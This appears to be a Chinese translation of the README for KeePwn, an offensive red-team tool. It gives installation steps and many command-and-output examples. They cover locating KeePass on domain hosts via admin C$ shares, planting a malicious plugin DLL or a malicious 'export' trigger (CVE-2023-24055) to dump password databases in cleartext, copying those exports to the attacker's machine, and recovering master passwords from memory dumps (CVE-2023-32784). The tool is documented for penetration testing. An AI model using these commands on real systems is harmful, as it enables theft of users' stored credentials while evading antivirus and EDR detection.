
一个帮助红队发现KeePass实例并提取秘密的Python脚本。
git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help
或者,如果你不想安装,只想在虚拟环境中运行:
git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
python3 KeePwn.py --help
KeePwn 的 search 模块用于识别目标环境中运行 KeePass 的主机:
$ python3 KeePwn.py search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt
[*] Starting remote KeePass search with 5 threads
[PC01.COMPANY.LOCAL] No KeePass-related file found
[PC02.COMPANY.LOCAL] No KeePass-related file found
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC04.COMPANY.LOCAL] No KeePass-related file found
[PC05.COMPANY.LOCAL] No KeePass-related file found
它利用 Active Directory 内置的 C$ 共享在默认位置查找与 KeePass 相关的文件,因此需要在目标上拥有管理员权限。
该模块首先会在每个用户的 %APPDATA%\KeePass 文件夹 中查找 KeePass.config.xml 配置文件,以及在默认安装路径(C:\Program Files\KeePass Password Safe 2)中查找 KeePass.exe。如果找到配置文件但 KeePass 未全局安装,KeePwn 将递归查找便携式安装,最多深入 --max-depth 个子文件夹。
这种基本搜索技术应该足以准确判断工作站上是否使用了 KeePass。此外,--get-process 选项将使用 Impacket 的 RPC 实现来确定 KeePass 当前是否在目标上运行。
还包含了一些提升使用体验的选项,允许你将搜索结果导出到 CSV 文件,仅显示找到 KeePass 的目标,以及调整并行线程数:
$ KeePwn search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv
[*] Starting remote KeePass search with 4 threads
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC03.COMPANY.LOCAL] Found running KeePass.exe process (User: COMPANY\jdoe, PID: 3820)
[+] Search results logged to keepwn_out.csv
KeePass 提供了一个插件框架,可被滥用以将恶意 DLL 加载到 KeePass 进程中,从而允许具有管理员权限的攻击者轻松导出数据库(参见:KeeFarceRebornPlugin)。
KeePwn 的 plugin 模块允许:
列出当前已安装的插件并枚举插件缓存
$ KeePwn plugin check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No path specified, searching in default locations..
[*] Found dbBackup.plgx in folder '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
[*] Found pDhkzWQYiobXhtBEEnbo in folder '\\C$\Users\jdoe\AppData\Local\KeePass\PluginCache'
添加和删除你的恶意插件
$ KeePwn plugin add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL --plugin KeeFarceRebornPlugin.dll
[*] No path specified, searching in default locations..
[*] Found KeePass Plugins directory '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
[!] About to add KeeFarceRebornPlugin.dll to KeePass Plugins directory, do you want to continue? [y/n]
> y
[+] Plugin successfully added to KeePass, wait for next restart, poll and enjoy!
轮询 %APPDATA% 以获取导出,并自动将其从远程主机移动到本地文件系统
$ KeePwn plugin poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE
[+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
[+] Moved remote export to ./export.xml
这些操作通过 SMB C$ 共享访问完成,由于没有执行命令,因此限制了 AV/EDR 检测。
如 @harmj0y 的博文(以及后来的 CVE-2023-24055)所述,KeePass 的触发系统可被滥用以明文导出数据库。
KeePwn 的 trigger 模块允许:
检查 KeePass 配置中当前是否写入了名为 "export" 的恶意触发器
$ KeePwn trigger check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No KeePass configuration path specified, searching in default locations..
[*] Found global KeePass configuration '\\C$\Program Files\KeePass Password Safe 2\KeePass.config.xml'
[*] PreferUserConfiguration flag is set to true, meaning that local configuration is used
[*] Found local KeePass configuration '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[+] No trigger found in KeePass configuration
注意,如果检测到的 KeePass 版本不受此技术影响,KeePwn 将阻止你滥用插件。
添加和删除一个名为 "export" 的恶意触发器,该触发器在下次 KeePass 启动时执行数据库的明文导出到 %APPDATA%
❯ python3 KeePwn.py trigger add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No KeePass configuration path specified, searching in default locations..
[*] Found global KeePass configuration '\\C$\Program Files\KeePass Password Safe 2\KeePass.config.xml'
[*] PreferUserConfiguration flag is set to true, meaning that local configuration is used
[*] Found local KeePass configuration '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[+] Malicious trigger 'export' successfully added to KeePass configuration file (it may be deleted if KeePass is already running)
轮询 %APPDATA% 以获取导出,并自动将其从远程主机移动到本地文件系统
$ KeePwn trigger poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE
[+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
[+] Moved remote export to ./export.xml
如果配置文件路径不是默认位置,可以使用 --config-path 参数指定。
如 @vdohney 所述,可以从内存中检索数据库的主密码(CVE-2023-32784,影响 KeePass 2.54 之前的版本)。
KeePwn 的 parse_dump 模块将在转储中搜索潜在的主密码候选。由于生成的字符串(设计上)是不完整的,该模块也可以用于针对指定的 KDBX 文件暴力破解缺失的第一个字符。
$ python3 KeePwn.py parse_dump -d ./KeePass.DMP --bruteforce Database.kdbx